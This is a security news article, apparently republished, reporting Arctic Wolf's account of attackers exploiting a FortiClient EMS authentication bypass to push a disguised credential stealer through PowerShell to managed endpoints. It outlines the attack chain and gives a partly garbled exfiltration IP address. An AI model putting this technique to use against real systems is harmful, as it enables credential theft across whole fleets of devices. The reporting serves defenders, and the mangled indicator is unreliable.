Attackers continue to exploit patched critical security flaws affecting FortiClient Endpoint Management Server (EMS) deployments to distribute credential-stealing malware.
“This campaign exploited trusted endpoint management infrastructure to distribute malware across managed endpoints,” Arctic Wolf said. “Threat actors disguised the credential-stealing payload as a Fortinet endpoint update and silently executed the malicious executable through PowerShell.”
This activity, observed by a cybersecurity firm in May 2026, involved exploitation of CVE-2026-35616 (CVSS score: 9.1), a critical pre-authentication API access bypass leading to privilege escalation. This issue has been resolved by FortiNet in FortiClient EMS 7.4.7 and later.
A successful compromise allows the attacker to modify configurations to defer firmware upgrade notifications, or modify remote access profile configurations and endpoint policies to inject malicious scripts to run on endpoint devices.
“The observed execution patterns suggest that the attacker was using FortiClient’s own management channels to push malicious PowerShell commands to managed endpoints in a manner that resembles legitimate management operations,” said Arctic Wolf.
“Once the attacker gained a route to modify the EMS management configuration, all managed endpoints became potential execution targets without requiring a separate compromise path to each device.”
Additionally, this attack was found to exploit a legitimate executable file associated with FortiClient, ‘fortitray.exe’, and use ‘cmd.exe’ to launch a .cmd script file. .cmd scripts are designed to call Base64-encoded PowerShell scripts. This script downloads a malicious payload, executes it, and extracts the result to “83.138.53”.[.]110″ via HTTP POST request.
The executable named “FortiEndpoint_Patch.exe” disguises itself as an update, but is actually a previously unreported Windows information stealer that can collect sensitive data from Chromium and Gecko-based browsers, including passwords, cookies, credit card information, and autofill details such as addresses and phone numbers.
The data is written to a log file and saved in the ProgramData directory. It is worth noting that the stealer does not have network-based stealing capabilities. It is a PowerShell script that sends the captured data to attacker-controlled infrastructure.
“Bypassing API authentication and interacting with EMS functionality in a privileged context, attackers were able to modify management configurations and execute malicious scripts on managed endpoints,” said Arctic Wolf.
“Session cookies and stored browser credentials can provide an attacker with subsequent access to cloud services, internal applications, and other authenticated resources, including when session reuse bypasses MFA prompts.”
Source link
